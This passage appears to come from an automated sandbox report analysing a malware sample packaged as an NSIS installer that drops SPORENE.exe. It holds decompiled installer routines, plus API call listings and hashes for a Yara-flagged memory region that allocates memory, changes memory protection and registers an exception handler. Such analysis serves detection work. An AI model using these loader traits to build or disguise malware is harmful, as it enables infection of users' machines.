                				_t23 = _a16;
                				_t53 = _a12;
                				_t44 = 0xffffffdc;
                				if(_t23 == 0) {
                					_push(0x14);
                					_pop(0);
                					_t24 = _t53;
                					if(_t53 < 0x100000) {
                						_push(0xa);
                						_pop(0);
                						_t44 = 0xffffffdd;
                					}
                					if(_t53 < 0x400) {
                						_t44 = 0xffffffde;
                					}
                					if(_t53 < 0xffff3333) {
                						_t52 = 0x14;
                						asm("cdq");
                						_t24 = 1 / _t52 + _t53;
                					}
                					_t25 = _t24 & 0x00ffffff;
                					_t55 = _t24 >> 0;
                					_t46 = 0xa;
                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                				} else {
                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                					_t50 = 0;
                				}
                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                			}

                APIs
                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                • wsprintfW.USER32 ref: 00404DF0
                • SetDlgItemTextW.USER32 ref: 00404E03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00405E0C(WCHAR* _a4) {
                				WCHAR* _t9;
                
                				_t9 = _a4;
                				_push( &(_t9[lstrlenW(_t9)]));
                				_push(_t9);
                				if( *(CharPrevW()) != 0x5c) {
                					lstrcatW(_t9, 0x40a014);
                				}
                				return _t9;
                			}

                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3936084776
                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403019(intOrPtr _a4) {
                				long _t2;
                				struct HWND__* _t3;
                				struct HWND__* _t6;
                
                				if(_a4 == 0) {
                					if( *0x42aa20 == 0) {
                						_t2 = GetTickCount();
                						if(_t2 >  *0x434f0c) {
                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                							 *0x42aa20 = _t3;
                							return ShowWindow(_t3, 5);
                						}
                						return _t2;
                					} else {
                						return E00406946(0);
                					}
                				} else {
                					_t6 =  *0x42aa20;
                					if(_t6 != 0) {
                						_t6 = DestroyWindow(_t6);
                					}
                					 *0x42aa20 = 0;
                					return _t6;
                				}
                			}

                APIs
                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                • GetTickCount.KERNEL32 ref: 0040304A
                • CreateDialogParamW.USER32 ref: 00403067
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00405F14(void* __eflags, intOrPtr _a4) {
                				int _t11;
                				signed char* _t12;
                				intOrPtr _t18;
                				intOrPtr* _t21;
                				signed int _t23;
                
                				E0040653D(0x42fa70, _a4);
                				_t21 = E00405EB7(0x42fa70);
                				if(_t21 != 0) {
                					E004067C4(_t21);
                					if(( *0x434f18 & 0x00000080) == 0) {
                						L5:
                						_t23 = _t21 - 0x42fa70 >> 1;
                						while(1) {
                							_t11 = lstrlenW(0x42fa70);
                							_push(0x42fa70);
                							if(_t11 <= _t23) {
                								break;
                							}
                							_t12 = E00406873();
                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                								E00405E58(0x42fa70);
                								continue;
                							} else {
                								goto L1;
                							}
                						}
                						E00405E0C();
                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                					}
                					_t18 =  *_t21;
                					if(_t18 == 0 || _t18 == 0x5c) {
                						goto L1;
                					} else {
                						goto L5;
                					}
                				}
                				L1:
                				return 0;
                			}









                APIs
                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3248276644-3936084776
                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				int _t15;
                				long _t16;
                
                				_t15 = _a8;
                				if(_t15 != 0x102) {
                					if(_t15 != 0x200) {
                						_t16 = _a16;
                						L7:
                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                							_push(_t16);
                							_push(6);
                							 *0x42d254 = _t16;
                							E00404ED4();
                						}
                						L11:
                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t16 = _a16;
                						goto L11;
                					}
                					_t16 = E00404E54(_a4, 1);
                					_t15 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E004044E5(0x413);
                				return 0;
                			}






                APIs
                • IsWindowVisible.USER32(?), ref: 00405542
                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                				int _v8;
                				long _t21;
                				long _t24;
                				char* _t30;
                
                				asm("sbb eax, eax");
                				_v8 = 0x800;
                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                				_t30 = _a16;
                				if(_t21 != 0) {
                					L4:
                					 *_t30 =  *_t30 & 0x00000000;
                				} else {
                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                					_t21 = RegCloseKey(_a20);
                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                						goto L4;
                					}
                				}
                				return _t21;
                			}








                APIs
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,00406672,80000002), ref: 00406451
                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248), ref: 0040645C
                Strings
                • C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00406412
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CloseQueryValue
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 3356406503-4160804946
                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403B57() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t8;
                
                				_t8 =  *0x42b22c;
                				_t3 = E00403B3C(_t2, 0);
                				if(_t8 != 0) {
                					do {
                						_t6 = _t8;
                						_t8 =  *_t8;
                						FreeLibrary( *(_t6 + 8));
                						_t3 = GlobalFree(_t6);
                					} while (_t8 != 0);
                				}
                				 *0x42b22c =  *0x42b22c & 0x00000000;
                				return _t3;
                			}








                APIs
                • FreeLibrary.KERNEL32(?,747DFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                • GlobalFree.KERNEL32 ref: 00403B78
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-3936084776
                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00405E58(WCHAR* _a4) {
                				WCHAR* _t5;
                				WCHAR* _t7;
                
                				_t7 = _a4;
                				_t5 =  &(_t7[lstrlenW(_t7)]);
                				while( *_t5 != 0x5c) {
                					_push(_t5);
                					_push(_t7);
                					_t5 = CharPrevW();
                					if(_t5 > _t7) {
                						continue;
                					}
                					break;
                				}
                				 *_t5 =  *_t5 & 0x00000000;
                				return  &(_t5[1]);
                			}






                APIs
                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003), ref: 00405E6E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3125694417
                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                				int _v8;
                				int _t12;
                				int _t14;
                				int _t15;
                				CHAR* _t17;
                				CHAR* _t27;
                
                				_t12 = lstrlenA(_a8);
                				_t27 = _a4;
                				_v8 = _t12;
                				while(lstrlenA(_t27) >= _v8) {
                					_t14 = _v8;
                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                					_t15 = lstrcmpiA(_t27, _a8);
                					_t27[_v8] =  *(_t14 + _t27);
                					if(_t15 == 0) {
                						_t17 = _t27;
                					} else {
                						_t27 = CharNextA(_t27);
                						continue;
                					}
                					L5:
                					return _t17;
                				}
                				_t17 = 0;
                				goto L5;
                			}










                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.626101047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: #100
                • String ID: VB5!6%*
                • API String ID: 1341478452-4246263594
                • Opcode ID: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
                • Instruction ID: d75cae8dad3e15aafd6d97e108f4f9e1e4e5bc980460d590f2dde34121b0546a
                • Opcode Fuzzy Hash: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
                • Instruction Fuzzy Hash: A462BA3115968A8FDB03DF38CAA5951FFB0FE2271032A1797D4948B1A3D324F56ACB52
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Executed Functions

                APIs
                  • Part of subcall function 0130FE24: LoadLibraryA.KERNELBASE(6119438F), ref: 013100EB
                • NtAllocateVirtualMemory.NTDLL ref: 0130C8F2
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateLibraryLoadMemoryVirtual
                • String ID: {
                • API String ID: 2616484454-366298937
                • Opcode ID: 9b49b23e4c7a18f46f1b9c42e7d37e70e24f3e2c5744d5ff1bdc47f54943f688
                • Instruction ID: f987189cf873475c73aa5814469b236ab6298b39a84d3bd2433042aefd32d1cf
                • Opcode Fuzzy Hash: 9b49b23e4c7a18f46f1b9c42e7d37e70e24f3e2c5744d5ff1bdc47f54943f688
                • Instruction Fuzzy Hash: 6051743510834ACFDB319F28CC653EA7BE5AF5A3A8F45066DCCCA9B590D3705981CB46
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAddVectoredExceptionHandler.NTDLL ref: 013144C3
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: ExceptionHandlerVectored
                • String ID:
                • API String ID: 3310709589-0
                • Opcode ID: 9ebe3133fe02f7034a063b5eb362a2b5ad660299a2431f0743cb6a49cf7c6123
                • Instruction ID: b5356fdc15028e2109ffaff22c0eae8bac5a9658abc5e0584644644cf74f7b23
                • Opcode Fuzzy Hash: 9ebe3133fe02f7034a063b5eb362a2b5ad660299a2431f0743cb6a49cf7c6123
                • Instruction Fuzzy Hash: DF91593160834DCFDF7D8E3889947EA77A6BF54368F45412BCC0B8BA5DD73089458A42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(-4D0ED916,642AAB63,642AAB67,?,642AAB6B,013122FD,-A07819C7,013091CF,-731CA9F9,97C36672), ref: 01313578
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 8ee12220395fb1947fa40ad3cb744629b557ab6ff8f255423d61304db694df4a
                • Instruction ID: ba628498823a48074b6a950e57e9eea4b4109f8475a70000f8e02359958a3490
                • Opcode Fuzzy Hash: 8ee12220395fb1947fa40ad3cb744629b557ab6ff8f255423d61304db694df4a
                • Instruction Fuzzy Hash: CA119EB174424A9FDB75CE5CCC84BEE37EAEBA8314F448429D849DB708C630DA09CA21
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNELBASE(6119438F), ref: 013100EB
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: cT
                • API String ID: 1029625771-4248416740
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: LibraryLoadMemoryProtectVirtual
                • String ID: xChm$}U(~$&PM
                • API String ID: 3389902171-3005590319
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%